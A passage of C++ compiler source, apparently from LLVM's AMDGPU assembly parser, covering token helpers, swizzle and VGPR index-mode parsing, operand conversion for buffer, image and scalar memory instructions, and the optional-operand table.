using namespace llvm::AMDGPU::Exp;
StringRef Str;
SMLoc S = getLoc();
if (!parseId(Str))
return MatchOperand_NoMatch;
unsigned Id = getTgtId(Str);
if (Id == ET_INVALID || !isSupportedTgtId(Id, getSTI())) {
Error(S, (Id == ET_INVALID) ?
"invalid exp target" :
"exp target is not supported on this GPU");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Id, S,
AMDGPUOperand::ImmTyExpTgt));
return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// parser helpers
//===----------------------------------------------------------------------===//
bool
AMDGPUAsmParser::isId(const AsmToken &Token, const StringRef Id) const {
return Token.is(AsmToken::Identifier) && Token.getString() == Id;
}
bool
AMDGPUAsmParser::isId(const StringRef Id) const {
return isId(getToken(), Id);
}
bool
AMDGPUAsmParser::isToken(const AsmToken::TokenKind Kind) const {
return getTokenKind() == Kind;
}
bool
AMDGPUAsmParser::trySkipId(const StringRef Id) {
if (isId(Id)) {
lex();
return true;
}
return false;
}
bool
AMDGPUAsmParser::trySkipId(const StringRef Pref, const StringRef Id) {
if (isToken(AsmToken::Identifier)) {
StringRef Tok = getTokenStr();
if (Tok.startswith(Pref) && Tok.drop_front(Pref.size()) == Id) {
lex();
return true;
}
}
return false;
}
bool
AMDGPUAsmParser::trySkipId(const StringRef Id, const AsmToken::TokenKind Kind) {
if (isId(Id) && peekToken().is(Kind)) {
lex();
lex();
return true;
}
return false;
}
bool
AMDGPUAsmParser::trySkipToken(const AsmToken::TokenKind Kind) {
if (isToken(Kind)) {
lex();
return true;
}
return false;
}
bool
AMDGPUAsmParser::skipToken(const AsmToken::TokenKind Kind,
const StringRef ErrMsg) {
if (!trySkipToken(Kind)) {
Error(getLoc(), ErrMsg);
return false;
}
return true;
}
bool
AMDGPUAsmParser::parseExpr(int64_t &Imm, StringRef Expected) {
SMLoc S = getLoc();
const MCExpr *Expr;
if (Parser.parseExpression(Expr))
return false;
if (Expr->evaluateAsAbsolute(Imm))
return true;
if (Expected.empty()) {
Error(S, "expected absolute expression");
} else {
Error(S, Twine("expected ", Expected) +
Twine(" or an absolute expression"));
}
return false;
}
bool
AMDGPUAsmParser::parseExpr(OperandVector &Operands) {
SMLoc S = getLoc();
const MCExpr *Expr;
if (Parser.parseExpression(Expr))
return false;
int64_t IntVal;
if (Expr->evaluateAsAbsolute(IntVal)) {
Operands.push_back(AMDGPUOperand::CreateImm(this, IntVal, S));
} else {
Operands.push_back(AMDGPUOperand::CreateExpr(this, Expr, S));
}
return true;
}
bool
AMDGPUAsmParser::parseString(StringRef &Val, const StringRef ErrMsg) {
if (isToken(AsmToken::String)) {
Val = getToken().getStringContents();
lex();
return true;
} else {
Error(getLoc(), ErrMsg);
return false;
}
}
bool
AMDGPUAsmParser::parseId(StringRef &Val, const StringRef ErrMsg) {
if (isToken(AsmToken::Identifier)) {
Val = getTokenStr();
lex();
return true;
} else {
if (!ErrMsg.empty())
Error(getLoc(), ErrMsg);
return false;
}
}
AsmToken
AMDGPUAsmParser::getToken() const {
return Parser.getTok();
}
AsmToken
AMDGPUAsmParser::peekToken() {
return isToken(AsmToken::EndOfStatement) ? getToken() : getLexer().peekTok();
}
void
AMDGPUAsmParser::peekTokens(MutableArrayRef<AsmToken> Tokens) {
auto TokCount = getLexer().peekTokens(Tokens);
for (auto Idx = TokCount; Idx < Tokens.size(); ++Idx)
Tokens[Idx] = AsmToken(AsmToken::Error, "");
}
AsmToken::TokenKind
AMDGPUAsmParser::getTokenKind() const {
return getLexer().getKind();
}
SMLoc
AMDGPUAsmParser::getLoc() const {
return getToken().getLoc();
}
StringRef
AMDGPUAsmParser::getTokenStr() const {
return getToken().getString();
}
void
AMDGPUAsmParser::lex() {
Parser.Lex();
}
SMLoc
AMDGPUAsmParser::getOperandLoc(std::function<bool(const AMDGPUOperand&)> Test,
const OperandVector &Operands) const {
for (unsigned i = Operands.size() - 1; i > 0; --i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
if (Test(Op))
return Op.getStartLoc();
}
return ((AMDGPUOperand &)*Operands[0]).getStartLoc();
}
SMLoc
AMDGPUAsmParser::getImmLoc(AMDGPUOperand::ImmTy Type,
const OperandVector &Operands) const {
auto Test = [=](const AMDGPUOperand& Op) { return Op.isImmTy(Type); };
return getOperandLoc(Test, Operands);
}
SMLoc
AMDGPUAsmParser::getRegLoc(unsigned Reg,
const OperandVector &Operands) const {
auto Test = [=](const AMDGPUOperand& Op) {
return Op.isRegKind() && Op.getReg() == Reg;
};
return getOperandLoc(Test, Operands);
}
SMLoc
AMDGPUAsmParser::getLitLoc(const OperandVector &Operands) const {
auto Test = [](const AMDGPUOperand& Op) {
return Op.IsImmKindLiteral() || Op.isExpr();
};
return getOperandLoc(Test, Operands);
}
SMLoc
AMDGPUAsmParser::getConstLoc(const OperandVector &Operands) const {
auto Test = [](const AMDGPUOperand& Op) {
return Op.isImmKindConst();
};
return getOperandLoc(Test, Operands);
}
//===----------------------------------------------------------------------===//
// swizzle
//===----------------------------------------------------------------------===//
LLVM_READNONE
static unsigned
encodeBitmaskPerm(const unsigned AndMask,
const unsigned OrMask,
const unsigned XorMask) {
using namespace llvm::AMDGPU::Swizzle;
return BITMASK_PERM_ENC |
(AndMask << BITMASK_AND_SHIFT) |
(OrMask << BITMASK_OR_SHIFT) |
(XorMask << BITMASK_XOR_SHIFT);
}
bool
AMDGPUAsmParser::parseSwizzleOperand(int64_t &Op,
const unsigned MinVal,
const unsigned MaxVal,
const StringRef ErrMsg,
SMLoc &Loc) {
if (!skipToken(AsmToken::Comma, "expected a comma")) {
return false;
}
Loc = getLoc();
if (!parseExpr(Op)) {
return false;
}
if (Op < MinVal || Op > MaxVal) {
Error(Loc, ErrMsg);
return false;
}
return true;
}
bool
AMDGPUAsmParser::parseSwizzleOperands(const unsigned OpNum, int64_t* Op,
const unsigned MinVal,
const unsigned MaxVal,
const StringRef ErrMsg) {
SMLoc Loc;
for (unsigned i = 0; i < OpNum; ++i) {
if (!parseSwizzleOperand(Op[i], MinVal, MaxVal, ErrMsg, Loc))
return false;
}
return true;
}
bool
AMDGPUAsmParser::parseSwizzleQuadPerm(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
int64_t Lane[LANE_NUM];
if (parseSwizzleOperands(LANE_NUM, Lane, 0, LANE_MAX,
"expected a 2-bit lane id")) {
Imm = QUAD_PERM_ENC;
for (unsigned I = 0; I < LANE_NUM; ++I) {
Imm |= Lane[I] << (LANE_SHIFT * I);
}
return true;
}
return false;
}
bool
AMDGPUAsmParser::parseSwizzleBroadcast(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
SMLoc Loc;
int64_t GroupSize;
int64_t LaneIdx;
if (!parseSwizzleOperand(GroupSize,
2, 32,
"group size must be in the interval [2,32]",
Loc)) {
return false;
}
if (!isPowerOf2_64(GroupSize)) {
Error(Loc, "group size must be a power of two");
return false;
}
if (parseSwizzleOperand(LaneIdx,
0, GroupSize - 1,
"lane id must be in the interval [0,group size - 1]",
Loc)) {
Imm = encodeBitmaskPerm(BITMASK_MAX - GroupSize + 1, LaneIdx, 0);
return true;
}
return false;
}
bool
AMDGPUAsmParser::parseSwizzleReverse(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
SMLoc Loc;
int64_t GroupSize;
if (!parseSwizzleOperand(GroupSize,
2, 32,
"group size must be in the interval [2,32]",
Loc)) {
return false;
}
if (!isPowerOf2_64(GroupSize)) {
Error(Loc, "group size must be a power of two");
return false;
}
Imm = encodeBitmaskPerm(BITMASK_MAX, 0, GroupSize - 1);
return true;
}
bool
AMDGPUAsmParser::parseSwizzleSwap(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
SMLoc Loc;
int64_t GroupSize;
if (!parseSwizzleOperand(GroupSize,
1, 16,
"group size must be in the interval [1,16]",
Loc)) {
return false;
}
if (!isPowerOf2_64(GroupSize)) {
Error(Loc, "group size must be a power of two");
return false;
}
Imm = encodeBitmaskPerm(BITMASK_MAX, 0, GroupSize);
return true;
}
bool
AMDGPUAsmParser::parseSwizzleBitmaskPerm(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
if (!skipToken(AsmToken::Comma, "expected a comma")) {
return false;
}
StringRef Ctl;
SMLoc StrLoc = getLoc();
if (!parseString(Ctl)) {
return false;
}
if (Ctl.size() != BITMASK_WIDTH) {
Error(StrLoc, "expected a 5-character mask");
return false;
}
unsigned AndMask = 0;
unsigned OrMask = 0;
unsigned XorMask = 0;
for (size_t i = 0; i < Ctl.size(); ++i) {
unsigned Mask = 1 << (BITMASK_WIDTH - 1 - i);
switch(Ctl[i]) {
default:
Error(StrLoc, "invalid mask");
return false;
case '0':
break;
case '1':
OrMask |= Mask;
break;
case 'p':
AndMask |= Mask;
break;
case 'i':
AndMask |= Mask;
XorMask |= Mask;
break;
}
}
Imm = encodeBitmaskPerm(AndMask, OrMask, XorMask);
return true;
}
bool
AMDGPUAsmParser::parseSwizzleOffset(int64_t &Imm) {
SMLoc OffsetLoc = getLoc();
if (!parseExpr(Imm, "a swizzle macro")) {
return false;
}
if (!isUInt<16>(Imm)) {
Error(OffsetLoc, "expected a 16-bit offset");
return false;
}
return true;
}
bool
AMDGPUAsmParser::parseSwizzleMacro(int64_t &Imm) {
using namespace llvm::AMDGPU::Swizzle;
if (skipToken(AsmToken::LParen, "expected a left parentheses")) {
SMLoc ModeLoc = getLoc();
bool Ok = false;
if (trySkipId(IdSymbolic[ID_QUAD_PERM])) {
Ok = parseSwizzleQuadPerm(Imm);
} else if (trySkipId(IdSymbolic[ID_BITMASK_PERM])) {
Ok = parseSwizzleBitmaskPerm(Imm);
} else if (trySkipId(IdSymbolic[ID_BROADCAST])) {
Ok = parseSwizzleBroadcast(Imm);
} else if (trySkipId(IdSymbolic[ID_SWAP])) {
Ok = parseSwizzleSwap(Imm);
} else if (trySkipId(IdSymbolic[ID_REVERSE])) {
Ok = parseSwizzleReverse(Imm);
} else {
Error(ModeLoc, "expected a swizzle mode");
}
return Ok && skipToken(AsmToken::RParen, "expected a closing parentheses");
}
return false;
}
OperandMatchResultTy
AMDGPUAsmParser::parseSwizzleOp(OperandVector &Operands) {
SMLoc S = getLoc();
int64_t Imm = 0;
if (trySkipId("offset")) {
bool Ok = false;
if (skipToken(AsmToken::Colon, "expected a colon")) {
if (trySkipId("swizzle")) {
Ok = parseSwizzleMacro(Imm);
} else {
Ok = parseSwizzleOffset(Imm);
}
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Imm, S, AMDGPUOperand::ImmTySwizzle));
return Ok? MatchOperand_Success : MatchOperand_ParseFail;
} else {
// Swizzle "offset" operand is optional.
// If it is omitted, try parsing other optional operands.
return parseOptionalOpr(Operands);
}
}
bool
AMDGPUOperand::isSwizzle() const {
return isImmTy(ImmTySwizzle);
}
//===----------------------------------------------------------------------===//
// VGPR Index Mode
//===----------------------------------------------------------------------===//
int64_t AMDGPUAsmParser::parseGPRIdxMacro() {
using namespace llvm::AMDGPU::VGPRIndexMode;
if (trySkipToken(AsmToken::RParen)) {
return OFF;
}
int64_t Imm = 0;
while (true) {
unsigned Mode = 0;
SMLoc S = getLoc();
for (unsigned ModeId = ID_MIN; ModeId <= ID_MAX; ++ModeId) {
if (trySkipId(IdSymbolic[ModeId])) {
Mode = 1 << ModeId;
break;
}
}
if (Mode == 0) {
Error(S, (Imm == 0)?
"expected a VGPR index mode or a closing parenthesis" :
"expected a VGPR index mode");
return UNDEF;
}
if (Imm & Mode) {
Error(S, "duplicate VGPR index mode");
return UNDEF;
}
Imm |= Mode;
if (trySkipToken(AsmToken::RParen))
break;
if (!skipToken(AsmToken::Comma,
"expected a comma or a closing parenthesis"))
return UNDEF;
}
return Imm;
}
OperandMatchResultTy
AMDGPUAsmParser::parseGPRIdxMode(OperandVector &Operands) {
using namespace llvm::AMDGPU::VGPRIndexMode;
int64_t Imm = 0;
SMLoc S = getLoc();
if (trySkipId("gpr_idx", AsmToken::LParen)) {
Imm = parseGPRIdxMacro();
if (Imm == UNDEF)
return MatchOperand_ParseFail;
} else {
if (getParser().parseAbsoluteExpression(Imm))
return MatchOperand_ParseFail;
if (Imm < 0 || !isUInt<4>(Imm)) {
Error(S, "invalid immediate: only 4-bit values are legal");
return MatchOperand_ParseFail;
}
}
Operands.push_back(
AMDGPUOperand::CreateImm(this, Imm, S, AMDGPUOperand::ImmTyGprIdxMode));
return MatchOperand_Success;
}
bool AMDGPUOperand::isGPRIdxMode() const {
return isImmTy(ImmTyGprIdxMode);
}
//===----------------------------------------------------------------------===//
// sopp branch targets
//===----------------------------------------------------------------------===//
OperandMatchResultTy
AMDGPUAsmParser::parseSOppBrTarget(OperandVector &Operands) {
// Make sure we are not parsing something
// that looks like a label or an expression but is not.
// This will improve error messages.
if (isRegister() || isModifier())
return MatchOperand_NoMatch;
if (!parseExpr(Operands))
return MatchOperand_ParseFail;
AMDGPUOperand &Opr = ((AMDGPUOperand &)*Operands[Operands.size() - 1]);
assert(Opr.isImm() || Opr.isExpr());
SMLoc Loc = Opr.getStartLoc();
// Currently we do not support arbitrary expressions as branch targets.
// Only labels and absolute expressions are accepted.
if (Opr.isExpr() && !Opr.isSymbolRefExpr()) {
Error(Loc, "expected an absolute expression or a label");
} else if (Opr.isImm() && !Opr.isS16Imm()) {
Error(Loc, "expected a 16-bit signed jump offset");
}
return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// Boolean holding registers
//===----------------------------------------------------------------------===//
OperandMatchResultTy
AMDGPUAsmParser::parseBoolReg(OperandVector &Operands) {
return parseReg(Operands);
}
//===----------------------------------------------------------------------===//
// mubuf
//===----------------------------------------------------------------------===//
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultCPol() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyCPol);
}
void AMDGPUAsmParser::cvtMubufImpl(MCInst &Inst,
const OperandVector &Operands,
bool IsAtomic,
bool IsLds) {
bool IsLdsOpcode = IsLds;
bool HasLdsModifier = false;
OptionalImmIndexMap OptionalIdx;
unsigned FirstOperandIdx = 1;
bool IsAtomicReturn = false;
if (IsAtomic) {
for (unsigned i = FirstOperandIdx, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
if (!Op.isCPol())
continue;
IsAtomicReturn = Op.getImm() & AMDGPU::CPol::GLC;
break;
}
if (!IsAtomicReturn) {
int NewOpc = AMDGPU::getAtomicNoRetOp(Inst.getOpcode());
if (NewOpc != -1)
Inst.setOpcode(NewOpc);
}
IsAtomicReturn = MII.get(Inst.getOpcode()).TSFlags &
SIInstrFlags::IsAtomicRet;
}
for (unsigned i = FirstOperandIdx, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
// Add the register arguments
if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
// Insert a tied src for atomic return dst.
// This cannot be postponed as subsequent calls to
// addImmOperands rely on correct number of MC operands.
if (IsAtomicReturn && i == FirstOperandIdx)
Op.addRegOperands(Inst, 1);
continue;
}
// Handle the case where soffset is an immediate
if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyNone) {
Op.addImmOperands(Inst, 1);
continue;
}
HasLdsModifier |= Op.isLDS();
// Handle tokens like 'offen' which are sometimes hard-coded into the
// asm string. There are no MCInst operands for these.
if (Op.isToken()) {
continue;
}
assert(Op.isImm());
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = i;
}
// This is a workaround for an llvm quirk which may result in an
// incorrect instruction selection. Lds and non-lds versions of
// MUBUF instructions are identical except that lds versions
// have mandatory 'lds' modifier. However this modifier follows
// optional modifiers and llvm asm matcher regards this 'lds'
// modifier as an optional one. As a result, an lds version
// of opcode may be selected even if it has no 'lds' modifier.
if (IsLdsOpcode && !HasLdsModifier) {
int NoLdsOpcode = AMDGPU::getMUBUFNoLdsInst(Inst.getOpcode());
if (NoLdsOpcode != -1) { // Got lds version - correct it.
Inst.setOpcode(NoLdsOpcode);
IsLdsOpcode = false;
}
}
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol, 0);
if (!IsLdsOpcode) { // tfe is not legal with lds opcodes
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyTFE);
}
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySWZ);
}
void AMDGPUAsmParser::cvtMtbuf(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptionalIdx;
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
// Add the register arguments
if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
continue;
}
// Handle the case where soffset is an immediate
if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyNone) {
Op.addImmOperands(Inst, 1);
continue;
}
// Handle tokens like 'offen' which are sometimes hard-coded into the
// asm string. There are no MCInst operands for these.
if (Op.isToken()) {
continue;
}
assert(Op.isImm());
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = i;
}
addOptionalImmOperand(Inst, Operands, OptionalIdx,
AMDGPUOperand::ImmTyOffset);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyFORMAT);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol, 0);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyTFE);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySWZ);
}
//===----------------------------------------------------------------------===//
// mimg
//===----------------------------------------------------------------------===//
void AMDGPUAsmParser::cvtMIMG(MCInst &Inst, const OperandVector &Operands,
bool IsAtomic) {
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
if (IsAtomic) {
// Add src, same as dst
assert(Desc.getNumDefs() == 1);
((AMDGPUOperand &)*Operands[I - 1]).addRegOperands(Inst, 1);
}
OptionalImmIndexMap OptionalIdx;
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
// Add the register arguments
if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
} else if (Op.isImmModifier()) {
OptionalIdx[Op.getImmTy()] = I;
} else if (!Op.isToken()) {
llvm_unreachable("unexpected operand type");
}
}
bool IsGFX10Plus = isGFX10Plus();
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDMask);
if (IsGFX10Plus)
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDim, -1);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyUNorm);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyR128A16);
if (IsGFX10Plus)
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyA16);
if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::tfe) != -1)
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyTFE);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyLWE);
if (!IsGFX10Plus)
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDA);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyD16);
}
void AMDGPUAsmParser::cvtMIMGAtomic(MCInst &Inst, const OperandVector &Operands) {
cvtMIMG(Inst, Operands, true);
}
void AMDGPUAsmParser::cvtSMEMAtomic(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptionalIdx;
bool IsAtomicReturn = false;
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
if (!Op.isCPol())
continue;
IsAtomicReturn = Op.getImm() & AMDGPU::CPol::GLC;
break;
}
if (!IsAtomicReturn) {
int NewOpc = AMDGPU::getAtomicNoRetOp(Inst.getOpcode());
if (NewOpc != -1)
Inst.setOpcode(NewOpc);
}
IsAtomicReturn = MII.get(Inst.getOpcode()).TSFlags &
SIInstrFlags::IsAtomicRet;
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
// Add the register arguments
if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
if (IsAtomicReturn && i == 1)
Op.addRegOperands(Inst, 1);
continue;
}
// Handle the case where soffset is an immediate
if (Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyNone) {
Op.addImmOperands(Inst, 1);
continue;
}
// Handle tokens like 'offen' which are sometimes hard-coded into the
// asm string. There are no MCInst operands for these.
if (Op.isToken()) {
continue;
}
assert(Op.isImm());
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = i;
}
if ((int)Inst.getNumOperands() <=
AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::offset))
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyCPol, 0);
}
void AMDGPUAsmParser::cvtIntersectRay(MCInst &Inst,
const OperandVector &Operands) {
for (unsigned I = 1; I < Operands.size(); ++I) {
auto &Operand = (AMDGPUOperand &)*Operands[I];
if (Operand.isReg())
Operand.addRegOperands(Inst, 1);
}
Inst.addOperand(MCOperand::createImm(1)); // a16
}
//===----------------------------------------------------------------------===//
// smrd
//===----------------------------------------------------------------------===//
bool AMDGPUOperand::isSMRDOffset8() const {
return isImm() && isUInt<8>(getImm());
}
bool AMDGPUOperand::isSMEMOffset() const {
return isImm(); // Offset range is checked later by validator.
}
bool AMDGPUOperand::isSMRDLiteralOffset() const {
// 32-bit literals are only supported on CI and we only want to use them
// when the offset is > 8-bits.
return isImm() && !isUInt<8>(getImm()) && isUInt<32>(getImm());
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultSMRDOffset8() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultSMEMOffset() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultSMRDLiteralOffset() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultFlatOffset() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyOffset);
}
//===----------------------------------------------------------------------===//
// vop3
//===----------------------------------------------------------------------===//
static bool ConvertOmodMul(int64_t &Mul) {
if (Mul != 1 && Mul != 2 && Mul != 4)
return false;
Mul >>= 1;
return true;
}
static bool ConvertOmodDiv(int64_t &Div) {
if (Div == 1) {
Div = 0;
return true;
}
if (Div == 2) {
Div = 3;
return true;
}
return false;
}
// Both bound_ctrl:0 and bound_ctrl:1 are encoded as 1.
// This is intentional and ensures compatibility with sp3.
// See bug 35397 for details.
static bool ConvertBoundCtrl(int64_t &BoundCtrl) {
if (BoundCtrl == 0 || BoundCtrl == 1) {
BoundCtrl = 1;
return true;
}
return false;
}
// Note: the order in this table matches the order of operands in AsmString.
static const OptionalOperand AMDGPUOptionalOperandTable[] = {
{"offen", AMDGPUOperand::ImmTyOffen, true, nullptr},
{"idxen", AMDGPUOperand::ImmTyIdxen, true, nullptr},
{"addr64", AMDGPUOperand::ImmTyAddr64, true, nullptr},
{"offset0", AMDGPUOperand::ImmTyOffset0, false, nullptr},
{"offset1", AMDGPUOperand::ImmTyOffset1, false, nullptr},
{"gds", AMDGPUOperand::ImmTyGDS, true, nullptr},
{"lds", AMDGPUOperand::ImmTyLDS, true, nullptr},
{"offset", AMDGPUOperand::ImmTyOffset, false, nullptr},
{"inst_offset", AMDGPUOperand::ImmTyInstOffset, false, nullptr},
{"", AMDGPUOperand::ImmTyCPol, false, nullptr},
{"swz", AMDGPUOperand::ImmTySWZ, true, nullptr},
{"tfe", AMDGPUOperand::ImmTyTFE, true, nullptr},
{"d16", AMDGPUOperand::ImmTyD16, true, nullptr},
{"high", AMDGPUOperand::ImmTyHigh, true, nullptr},
{"clamp", AMDGPUOperand::ImmTyClampSI, true, nullptr},
{"omod", AMDGPUOperand::ImmTyOModSI, false, ConvertOmodMul},
{"unorm", AMDGPUOperand::ImmTyUNorm, true, nullptr},
{"da", AMDGPUOperand::ImmTyDA, true, nullptr},
{"r128", AMDGPUOperand::ImmTyR128A16, true, nullptr},
{"a16", AMDGPUOperand::ImmTyA16, true, nullptr},
{"lwe", AMDGPUOperand::ImmTyLWE, true, nullptr},
{"d16", AMDGPUOperand::ImmTyD16, true, nullptr},
{"dmask", AMDGPUOperand::ImmTyDMask, false, nullptr},
{"dim", AMDGPUOperand::ImmTyDim, false, nullptr},
{"row_mask", AMDGPUOperand::ImmTyDppRowMask, false, nullptr},
{"bank_mask", AMDGPUOperand::ImmTyDppBankMask, false, nullptr},
{"bound_ctrl", AMDGPUOperand::ImmTyDppBoundCtrl, false, ConvertBoundCtrl},
{"fi", AMDGPUOperand::ImmTyDppFi, false, nullptr},
{"dst_sel", AMDGPUOperand::ImmTySdwaDstSel, false, nullptr},
{"src0_sel", AMDGPUOperand::ImmTySdwaSrc0Sel, false, nullptr},
{"src1_sel", AMDGPUOperand::ImmTySdwaSrc1Sel, false, nullptr},
{"dst_unused", AMDGPUOperand::ImmTySdwaDstUnused, false, nullptr},
{"compr", AMDGPUOperand::ImmTyExpCompr, true, nullptr },
{"vm", AMDGPUOperand::ImmTyExpVM, true, nullptr},
{"op_sel", AMDGPUOperand::ImmTyOpSel, false, nullptr},
{"op_sel_hi", AMDGPUOperand::ImmTyOpSelHi, false, nullptr},
{"neg_lo", AMDGPUOperand::ImmTyNegLo, false, nullptr},
{"neg_hi", AMDGPUOperand::ImmTyNegHi, false, nullptr},
{"blgp", AMDGPUOperand::ImmTyBLGP, false, nullptr},
{"cbsz", AMDGPUOperand::ImmTyCBSZ, false, nullptr},
{"abid", AMDGPUOperand::ImmTyABID, false, nullptr}
};
void AMDGPUAsmParser::onBeginOfFile() {
if (!getParser().getStreamer().getTargetStreamer() ||
getSTI().getTargetTriple().getArch() == Triple::r600)
return;
if (!getTargetStreamer().getTargetID())
getTargetStreamer().initializeTargetID(getSTI(), getSTI().getFeatureString());
if (isHsaAbiVersion3AndAbove(&getSTI()))
getTargetStreamer().EmitDirectiveAMDGCNTarget();
}
OperandMatchResultTy AMDGPUAsmParser::parseOptionalOperand(OperandVector &Operands) {
OperandMatchResultTy res = parseOptionalOpr(Operands);
// This is a hack to enable hardcoded mandatory operands which follow
// optional operands.
//
// Current design assumes that all operands after the first optional operand
// are also optional. However implementation of some instructions violates
// this rule (see e.g. flat/global atomic which have hardcoded 'glc' operands).
//
// To alleviate this problem, we have to (implicitly) parse extra operands
// to make sure autogenerated parser of custom operands never hit hardcoded
// mandatory operands.
for (unsigned i = 0; i < MAX_OPR_LOOKAHEAD; ++i) {
if (res != MatchOperand_Success ||
isToken(AsmToken::EndOfStatement))
break;
trySkipToken(AsmToken::Comma);
res = parseOptionalOpr(Operands);
}
return res;
}
OperandMatchResultTy AMDGPUAsmParser::parseOptionalOpr(OperandVector &Operands) {
OperandMatchResultTy res;
for (const OptionalOperand &Op : AMDGPUOptionalOperandTable) {
// try to parse any optional operand here
if (Op.IsBit) {
res = parseNamedBit(Op.Name, Operands, Op.Type);
} else if (Op.Type == AMDGPUOperand::ImmTyOModSI) {
res = parseOModOperand(Operands);
} else if (Op.Type == AMDGPUOperand::ImmTySdwaDstSel ||
Op.Type == AMDGPUOperand::ImmTySdwaSrc0Sel ||
Op.Type == AMDGPUOperand::ImmTySdwaSrc1Sel) {
res = parseSDWASel(Operands, Op.Name, Op.Type);
} else if (Op.Type == AMDGPUOperand::ImmTySdwaDstUnused) {
res = parseSDWADstUnused(Operands);
} else if (Op.Type == AMDGPUOperand::ImmTyOpSel ||
Op.Type == AMDGPUOperand::ImmTyOpSelHi ||
Op.Type == AMDGPUOperand::ImmTyNegLo ||
Op.Type == AMDGPUOperand::ImmTyNegHi) {
res = parseOperandArrayWithPrefix(Op.Name, Operands, Op.Type,
Op.ConvertResult);
} else if (Op.Type == AMDGPUOperand::ImmTyDim) {
res = parseDim(Operands);
} else if (Op.Type == AMDGPUOperand::ImmTyCPol) {
res = parseCPol(Operands);
} else {
res = parseIntWithPrefix(Op.Name, Operands, Op.Type, Op.ConvertResult);
}
if (res != MatchOperand_NoMatch) {
return res;
}
}
return MatchOperand_NoMatch;
}
OperandMatchResultTy AMDGPUAsmParser::parseOModOperand(OperandVector &Operands) {
StringRef Name = getTokenStr();
if (Name == "mul") {
return parseIntWithPrefix("mul", Operands,
AMDGPUOperand::ImmTyOModSI, ConvertOmodMul);
}
if (Name == "div") {
return parseIntWithPrefix("div", Operands,
AMDGPUOperand::ImmTyOModSI, ConvertOmodDiv);
}
return MatchOperand_NoMatch;
}
